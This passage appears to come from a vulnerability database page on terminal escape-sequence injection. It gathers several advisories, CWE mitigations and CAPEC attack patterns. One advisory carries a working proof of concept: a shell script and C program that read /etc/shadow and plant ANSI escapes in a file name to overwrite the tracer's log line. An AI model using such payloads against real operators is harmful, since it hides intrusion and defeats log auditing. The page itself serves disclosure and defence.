"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "11.3.0-rc1"
},
{
"fixed": "11.3.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "11.2.0-rc1"
},
{
"fixed": "11.2.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "10.11.0-rc1"
},
{
"fixed": "10.11.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0-20260105080200-d27a2195068d"
},
{
"fixed": "8.0.0-20260217110922-b7d4a1f1f59b"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-3108"
],
"database_specific": {
"cwe_ids": [
"CWE-150"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-31T23:02:43Z",
"nvd_published_at": "2026-03-26T17:16:41Z",
"severity": "HIGH"
},
"details": "Mattermost versions 11.2.x \u003c= 11.2.2, 10.11.x \u003c= 10.11.10, 11.4.x \u003c= 11.4.0, 11.3.x \u003c= 11.3.1 fail to sanitize user-controlled post content in the mmctl commands terminal output which allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences that enable screen manipulation, fake prompts, and clipboard hijacking. Mattermost Advisory ID: MMSA-2026-00599.",
"id": "GHSA-3439-vqgj-2gcf",
"modified": "2026-03-31T23:02:57Z",
"published": "2026-03-26T18:31:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3108"
},
{
"type": "PACKAGE",
"url": "https://github.com/mattermost/mattermost"
},
{
"type": "WEB",
"url": "https://mattermost.com/security-updates"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Mattermost allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences"
}
GHSA-34R5-6J7W-235F
Vulnerability from github – Published: 2026-04-22 18:50 – Updated: 2026-04-22 18:50Description
String fields from eBPF events in columns output mode are rendered to the terminal without any sanitization of control characters or ANSI escape sequences.
Therefore, a maliciously forged – partially or completely – event payload, coming from an observed container, might inject the escape sequences into the terminal of ig operators, with various effects.
The columns output mode is the default when running ig run interactively.
PoC
Attachments
run.sh
#!/bin/bash
set -e
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
CONTAINER_NAME="poc-escape-inject"
echo "Make sure ig is running in another terminal:"
echo " sudo ig run trace_open -c ${CONTAINER_NAME}"
echo ""
echo "Press Enter to continue..."
read -r
sudo docker run --rm \
--name "${CONTAINER_NAME}" \
-v "${SCRIPT_DIR}/escape_inject.c:/src/escape_inject.c:ro" \
gcc:latest \
bash -c "
gcc -o /tmp/escape_inject /src/escape_inject.c && \
/tmp/escape_inject
"
escape_inject.c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
static void read_file(const char *path)
{
int fd = open(path, O_RDONLY);
if (fd >= 0)
close(fd);
}
static void create_file(const char *path)
{
int fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);
if (fd >= 0)
close(fd);
}
int main(void)
{
printf("[1] normal activity\n");
create_file("/tmp/app.log");
printf("[2] malicious read of /etc/shadow\n");
read_file("/etc/shadow");
usleep(300000);
printf("[3] tampering the log\n");
create_file("/etc\x1b[1A/bashrc\x1b[1B\x1b[13C");
usleep(300000);
return 0;
}
- Setup a Linux host and build/install
igversion0.48.0 - Run the attached
run.shon a terminal - Run
sudo ig run trace_open -c poc-escape-injecton another terminal - Press "Enter" on the terminal attached to
run.sh - Observe the events traced by
ig - Notice that, at some point, the line where
/etc/shadowis logged is overwritten/etc/bashrc, demonstrating the log injection
Impact
The impact depends on the injection point – mostly due to length limitations – and on the terminal used by the operator when running displaying columns output.
At the very least, the injection can be used for Log Injection, by inserting new lines or deleting existing ones.
However, by leveraging Operating System Command (OSC) ANSI escape sequences, the impact on modern terminal can vary, possibly allowing an attacker to:
- lead to DoS (Denial of Service)
- write to the system clipboard
- create hyperlinks to attacker-controlled servers
- change window title
- potentially execute code (see referenced resources)
Resources
- https://www.youtube.com/watch?v=spb8Gk9Z09Y
Notes
The json output mode was already sanitizing the content.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/inspektor-gadget/inspektor-gadget"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.49.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25996"
],
"database_specific": {
"cwe_ids": [
"CWE-150"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-22T18:50:32Z",
"nvd_published_at": "2026-02-12T21:16:02Z",
"severity": "MODERATE"
},
"details": "### Description\nString fields from eBPF events in `columns` output mode are rendered to the terminal without any sanitization of control characters or ANSI escape sequences. \n\nTherefore, a maliciously forged \u2013\u00a0partially or completely \u2013 event payload, coming from an observed container, might inject the escape sequences into the terminal of `ig` operators, with various effects.\n\nThe `columns` output mode is the default when running `ig run` interactively.\n\n### PoC\n\n#### Attachments\nrun.sh\n```bash\n\n#!/bin/bash\nset -e\n\nSCRIPT_DIR=\"$(cd \"$(dirname \"$0\")\" \u0026\u0026 pwd)\"\nCONTAINER_NAME=\"poc-escape-inject\"\n\necho \"Make sure ig is running in another terminal:\"\necho \" sudo ig run trace_open -c ${CONTAINER_NAME}\"\necho \"\"\necho \"Press Enter to continue...\"\nread -r\n\nsudo docker run --rm \\\n --name \"${CONTAINER_NAME}\" \\\n -v \"${SCRIPT_DIR}/escape_inject.c:/src/escape_inject.c:ro\" \\\n gcc:latest \\\n bash -c \"\n gcc -o /tmp/escape_inject /src/escape_inject.c \u0026\u0026 \\\n /tmp/escape_inject\n \"\n```\n\nescape_inject.c\n```c\n#include \u003cfcntl.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cunistd.h\u003e\n\nstatic void read_file(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd \u003e= 0)\n\t\tclose(fd);\n}\n\nstatic void create_file(const char *path)\n{\n\tint fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);\n\tif (fd \u003e= 0)\n\t\tclose(fd);\n}\n\nint main(void)\n{\n\tprintf(\"[1] normal activity\\n\");\n\tcreate_file(\"/tmp/app.log\");\n\tprintf(\"[2] malicious read of /etc/shadow\\n\");\n\tread_file(\"/etc/shadow\");\n\tusleep(300000);\n\tprintf(\"[3] tampering the log\\n\");\n\tcreate_file(\"/etc\\x1b[1A/bashrc\\x1b[1B\\x1b[13C\");\n\tusleep(300000);\n\treturn 0;\n}\n```\n\n1. Setup a Linux host and build/install `ig` version `0.48.0`\n2. Run the attached `run.sh` on a terminal\n3. Run `sudo ig run trace_open -c poc-escape-inject` on another terminal\n4. Press \"Enter\" on the terminal attached to `run.sh`\n5. Observe the events traced by `ig`\n6. Notice that, at some point, the line where `/etc/shadow` is logged is overwritten `/etc/bashrc`, demonstrating the log injection\n\n\n### Impact\n\nThe impact depends on the injection point \u2013 mostly due to length limitations \u2013 and on the terminal used by the operator when running displaying `columns` output.\n\nAt the very least, the injection can be used for [Log Injection](https://owasp.org/www-community/attacks/Log_Injection), by inserting new lines or deleting existing ones.\n\nHowever, by leveraging Operating System Command (OSC) ANSI escape sequences, the impact on modern terminal can vary, possibly allowing an attacker to:\n\n- lead to DoS (Denial of Service)\n- write to the system clipboard\n- create hyperlinks to attacker-controlled servers\n- change window title\n- potentially execute code (see referenced resources)\n\n### Resources\n- https://www.youtube.com/watch?v=spb8Gk9Z09Y\n\n### Notes\n\nThe `json` output mode was already sanitizing the content.",
"id": "GHSA-34r5-6j7w-235f",
"modified": "2026-04-22T18:50:32Z",
"published": "2026-04-22T18:50:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/inspektor-gadget/inspektor-gadget/security/advisories/GHSA-34r5-6j7w-235f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25996"
},
{
"type": "WEB",
"url": "https://github.com/inspektor-gadget/inspektor-gadget/commit/d59cf72971f9b7110d9c179dc8ae8b7a11dbd6d2"
},
{
"type": "PACKAGE",
"url": "https://github.com/inspektor-gadget/inspektor-gadget"
},
{
"type": "WEB",
"url": "https://github.com/inspektor-gadget/inspektor-gadget/releases/tag/v0.49.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Inspektor Gadget uses unsanitized ANSI Escape Sequences In `columns` Output Mode"
}
GHSA-4362-X25F-C5CH
Vulnerability from github – Published: 2026-02-05 21:32 – Updated: 2026-02-05 21:32Tanium addressed an unauthorized code execution vulnerability in Tanium Appliance.
{
"affected": [],
"aliases": [
"CVE-2025-15311"
],
"database_specific": {
"cwe_ids": [
"CWE-150"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-05T19:15:52Z",
"severity": "HIGH"
},
"details": "Tanium addressed an unauthorized code execution vulnerability in Tanium Appliance.",
"id": "GHSA-4362-x25f-c5ch",
"modified": "2026-02-05T21:32:41Z",
"published": "2026-02-05T21:32:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15311"
},
{
"type": "WEB",
"url": "https://security.tanium.com/TAN-2025-002"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4F3F-7MF9-QRHC
Vulnerability from github – Published: 2022-04-29 01:25 – Updated: 2024-08-22 18:31The xterm terminal emulator in XFree86 4.2.0 and earlier allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.
{
"affected": [],
"aliases": [
"CVE-2003-0063"
],
"database_specific": {
"cwe_ids": [
"CWE-150"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2003-03-03T05:00:00Z",
"severity": "HIGH"
},
"details": "The xterm terminal emulator in XFree86 4.2.0 and earlier allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user\u0027s terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.",
"id": "GHSA-4f3f-7mf9-qrhc",
"modified": "2024-08-22T18:31:18Z",
"published": "2022-04-29T01:25:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2003-0063"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0093.html"
},
{
"type": "WEB",
"url": "http://marc.info/?l=bugtraq\u0026m=104612710031920\u0026w=2"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2003/dsa-380"
},
{
"type": "WEB",
"url": "http://www.iss.net/security_center/static/11414.php"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2024/06/15/1"
},
{
"type": "WEB",
"url": "http://www.redhat.com/support/errata/RHSA-2003-064.html"
},
{
"type": "WEB",
"url": "http://www.redhat.com/support/errata/RHSA-2003-065.html"
},
{
"type": "WEB",
"url": "http://www.redhat.com/support/errata/RHSA-2003-066.html"
},
{
"type": "WEB",
"url": "http://www.redhat.com/support/errata/RHSA-2003-067.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/6940"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
Mitigation
Developers should anticipate that escape, meta and control characters/sequences will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-28
Strategy: Output Encoding
While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88).
Mitigation MIT-20
Strategy: Input Validation
Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
Mitigation
When using output from an LLM, neutralize or strip escape codes before redirecting output to the terminal or other rendering engine that would process the codes. The neutralization could require that the character be printable and/or allowable whitespace, such as a carriage return or newline. Be deliberate about what to allow.
Mitigation
When using an LLM: during tokenizer training, suppress escape codes from the tokenizer's vocabulary. Depending on context, this could be accomplished by removing the codes from input to the tokenizer, or removing the map from the string to its token ID. It is generally unlikely that this removal would adversely affect the quality or correctness of what is generated, e.g. advice requests for terminal settings to change colors.
CAPEC-134: Email Injection
An adversary manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol.
CAPEC-41: Using Meta-characters in E-mail Headers to Inject Malicious Payloads
This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.
CAPEC-81: Web Server Logs Tampering
Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.
CAPEC-93: Log Injection-Tampering-Forging
This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.